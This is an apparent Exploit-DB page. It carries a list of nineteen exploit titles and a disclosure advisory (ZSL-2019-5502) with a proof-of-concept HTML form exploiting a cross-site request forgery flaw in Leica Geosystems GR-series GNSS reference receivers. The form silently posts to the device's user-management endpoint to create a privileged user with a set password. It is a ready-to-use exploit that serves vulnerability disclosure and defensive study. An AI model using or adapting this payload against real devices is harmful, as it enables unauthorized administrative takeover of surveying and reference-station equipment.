deaee53895
19 changes to exploits/shellcodes Microsoft Edge 44.17763.1.0 - NULL Pointer Dereference BlueAuditor 1.7.2.0 - 'Key' Denial of Service (PoC) SpotFTP Password Recover 2.4.2 - 'Name' Denial of Service (PoC) Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC) KioWare Server Version 4.9.6 - Weak Folder Permissions Privilege Escalation Mailcleaner - Authenticated Remote Code Execution (Metasploit) Embed Video Scripts - Persistent Cross-Site Scripting All in One Video Downloader 1.2 - Authenticated SQL Injection LayerBB 1.1.1 - Persistent Cross-Site Scripting MyBB OUGC Awards Plugin 1.8.3 - Persistent Cross-Site Scripting PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Scripting phpMoAdmin MongoDB GUI 1.1.5 - Cross-Site Request Forgery / Cross-Site Scripting Wordpress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation MyT Project Management 1.5.1 - 'Charge[group_total]' SQL Injection Roxy Fileman 1.4.5 - Unrestricted File Upload / Directory Traversal Ajera Timesheets 9.10.16 - Deserialization of Untrusted Data Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - Cross-Site Request Forgery Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection Huawei E5330 21.210.09.00.158 - Cross-Site Request Forgery (Send SMS)
58 lines
No EOL
2 KiB
HTML
58 lines
No EOL
2 KiB
HTML
<--
|
|
|
|
Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 Cross-Site Request Forgery
|
|
|
|
|
|
Vendor: Leica Geosystems AG
|
|
Product web page: https://www.leica-geosystems.com
|
|
Affected version: 4.30.063
|
|
4.20.232
|
|
4.11.606
|
|
3.22.1818
|
|
3.10.1633
|
|
2.62.782
|
|
1.00.395
|
|
|
|
Summary: The Leica GR10 is the next generation GNSS reference station receiver
|
|
that combines the latest state-of-the-art technologies with a streamlined
|
|
'plug and play' workflow. Designed for a wide variety of GNSS reference station
|
|
applications, the Leica GR10 offers new levels of simplicity, reliability and
|
|
performance.
|
|
|
|
Desc: The application interface allows users to perform certain actions via
|
|
HTTP requests without performing any validity checks to verify the requests.
|
|
This can be exploited to perform certain actions with administrative privileges
|
|
if a logged-in user visits a malicious web site.
|
|
|
|
Tested on: BarracudaServer.com (WindowsCE)
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2019-5502
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5502.php
|
|
|
|
|
|
18.12.2018
|
|
|
|
-->
|
|
|
|
|
|
<html>
|
|
<body>
|
|
<form action="http://192.168.1.17/config/config_UserManagementPostBackHelper.lsp" method="POST">
|
|
<input type="hidden" name="txtHelpPage" value="config_changeuser" />
|
|
<input type="hidden" name="txtUsername" value="testingus" />
|
|
<input type="hidden" name="txtPassword" value="12345678" />
|
|
<input type="hidden" name="txtConfirmPassword" value="12345678" />
|
|
<input type="hidden" name="webRole" value="3" />
|
|
<input type="hidden" name="ftpRole" value="2" />
|
|
<input type="hidden" name="TxtOperationMode" value="2" />
|
|
<input type="hidden" name="txtEditedUser" value="" />
|
|
<input type="hidden" name="userId" value="nil" />
|
|
<input type="submit" value="Init" />
|
|
</form>
|
|
</body>
|
|
</html> |